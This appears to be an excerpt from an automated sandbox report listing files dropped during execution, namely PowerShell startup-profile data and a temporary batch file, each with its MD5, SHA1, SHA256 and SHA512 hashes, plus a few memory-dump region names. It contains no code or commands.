C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | b49b4568e58d92adb2364d63f8e93e40 |
| SHA1 | 2f3ea5c739d4bf93fc706580e91a284d05f8809f |
| SHA256 | 4d684f3c0fdaf79abec51fb181b2aef1a9ce532408bdc06d6aa6b0c114b699e7 |
| SHA512 | 2054bf5fc94786910886410a32b3e80a72d6cbc297c8126129c898048224825f520aa134287040abfc19864e672ed2d56ba1dd4ec5e0efca87b2e5c8182da050 |
memory/3508-43-0x0000025B71C40000-0x0000025B71C52000-memory.dmp
memory/3508-44-0x0000025B71ED0000-0x0000025B71EE6000-memory.dmp
memory/2272-45-0x00007FFDFEE30000-0x00007FFDFF8F2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f65feb0fbbd0fcb9da91d117a38e4f31 |
| SHA1 | 95b1256dd050df6d555a4d06d4dc7ac542b6a070 |
| SHA256 | cb0bff45abfcccadc000e77840ccf5004ae4197a8d98baab877e6e9c238bba0c |
| SHA512 | 0715ba19e75a60eeb6cf98f4bc80980f1f1e681bd69d3ce242bf1c50787b82eb99064de0c0753c4259dcc8837a65ac2b7c84b3c1f114200cb252c05e448b1776 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a9fa92a4f2e2ec9e244d43a6a4f8fb9 |
| SHA1 | 9910190edfaccece1dfcc1d92e357772f5dae8f7 |
| SHA256 | 0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888 |
| SHA512 | 5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9030854a24cf37b7b4e3650aac67d427 |
| SHA1 | 27f3e35705bbe6388da04bf97e09da1875a6bc71 |
| SHA256 | e818d49edbec3553b77c8a400c04fc88b601614946c281fc9c86acf9498010e0 |
| SHA512 | f402098f60d99d7e7130095c6965bb540454ff9867e72a9c2efaf833967639b802f193f9e73af53829167b43a2d9100e19f9056621f75543fa2aadad1e185dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a116d56b723a0d248b5a38cbc3429288 |
| SHA1 | 75efdbe43b0db5b4b4761166e1a6926316715f54 |
| SHA256 | f17648922a442aed77374620c12e8a0fb492290a191204ccdb1eca3dcf2d6258 |
| SHA512 | a19db0a5120a5857571ec2593d80e9d78405a9fb4bee0f358c8dca484d1f2760d79cdb9a7abfd48db1175d09be6b190e0d02837f59cc10f212215f16b14986c0 |
C:\Users\Admin\AppData\Local\Temp\tmpDA81.tmp.bat
| MD5 | 2e33c6b784aa31150c78fd6063e3a88a |
| SHA1 | 4c0af3d16cb4a4a5b8f3433b642b086066da5218 |
| SHA256 | d93f9bbb1e7613b7d354be6333a7a5eac2c3019c626d9f00973d4bdb697906ae |
| SHA512 | 4db0eb6184b5afa3314d01d98652cb8e74a1dfe1f5632fe79b92a8c6c1e0bcd8630f02165e4034b26ea49f1b567f63f296981d3b658e24383895a3b68695b338 |